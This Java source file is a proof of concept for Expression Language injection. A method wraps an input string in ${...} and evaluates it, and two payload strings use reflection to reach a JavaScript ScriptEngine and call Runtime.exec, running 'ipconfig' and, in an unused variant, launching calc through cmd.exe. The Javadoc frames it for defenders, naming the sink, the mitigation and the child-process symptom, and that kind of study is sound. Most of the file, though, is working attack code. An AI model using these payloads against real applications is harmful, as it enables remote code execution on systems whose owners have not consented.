package shell.bypass;
import javax.el.ELManager;
import javax.el.ExpressionFactory;
import javax.el.StandardELContext;
import javax.el.ValueExpression;
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
/**
 * Proof-of-concept showing that a string handed to
 * {@link ExpressionFactory#createValueExpression} after being wrapped in
 * {@code ${...}} is evaluated as Expression Language with reflection available
 * ({@code getClass().forName(...)}), which in this file ends in
 * {@code Runtime.exec}.
 *
 * <p>From a defender's perspective the sink is {@link #ELeval(String)}: any
 * caller that lets attacker-controlled text reach its {@code payload}
 * parameter gives that attacker code execution inside the JVM. The mitigation
 * is to never build EL expression text from untrusted input (expression text
 * is code, not data); an application JVM spawning an unexpected child process
 * is the observable symptom worth alerting on.
 */
public class test3 {
    /**
     * Entry point: builds an EL expression that reaches a JavaScript
     * {@code ScriptEngine} and runs {@code ipconfig}, then evaluates it via
     * {@link #ELeval(String)}.
     *
     * @param args unused
     * @throws Exception propagated from {@link #ELeval(String)}
     */
    public static void main(String[] args) throws Exception {
        // Evaluated below: reflection from an empty-string literal to
        // ScriptEngineManager, then a "js" engine whose eval() calls Runtime.exec.
        String payload = "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"js\").eval(\"var exp='ipconfig';java.lang.Runtime.getRuntime().exec(exp);\")";
        // Second variant; it is never passed to ELeval, so it is dead in this file.
        String poc = "''.getClass().forName('javax.script.ScriptEngineManager')" +
                ".newInstance().getEngineByName('nashorn')" +
                ".eval(\"s=[3];s[0]='cmd.exe';s[1]='/c';s[2]='calc';java.lang.Runtime.getRuntime().exec(s);\")";
        ELeval(payload);
    }

    /**
     * Wraps {@code payload} in {@code ${...}}, evaluates it against a
     * {@link StandardELContext}, casts the result to {@link Process} and
     * echoes that process's stdout line by line.
     *
     * <p>This is the injection sink: {@code payload} is concatenated straight
     * into the expression text, so whatever reaches it is executed as EL.
     *
     * @param payload EL expression body (without the {@code ${}} delimiters);
     *                it must evaluate to a {@link Process}, otherwise the cast
     *                below throws {@link ClassCastException}
     * @throws Exception from EL evaluation or from reading the process output
     */
    public static void ELeval(String payload) throws Exception{
        ELManager elManager = new ELManager();
        StandardELContext elContext = elManager.getELContext(); // author's note: obtains this.context
        ExpressionFactory expressionFactory = elManager.getExpressionFactory(); // author's note: then this.factory = expressionFactory
        /*
         * Author's reference for where the ${...} wrapping comes from
         * (not part of this file):
         * private static String bracket(String expression) {
         *     return "${" + expression + "}";
         * }
         */
        ValueExpression valueExpression = expressionFactory.createValueExpression(elContext, "${" + payload + "}", Object.class);
        // getValue() performs the evaluation; the result is assumed to be a Process.
        InputStream inputStream = ((Process) valueExpression.getValue(elContext)).getInputStream();
        // NOTE(review): no charset is given, so the platform default decodes the output.
        BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
        String line;
        while ((line=bufferedReader.readLine())!=null){
            System.out.println(line);
        }
        // NOTE(review): not in try-with-resources, so an exception in the loop
        // above leaves the reader (and the process's stdout pipe) unclosed.
        bufferedReader.close();
    }
}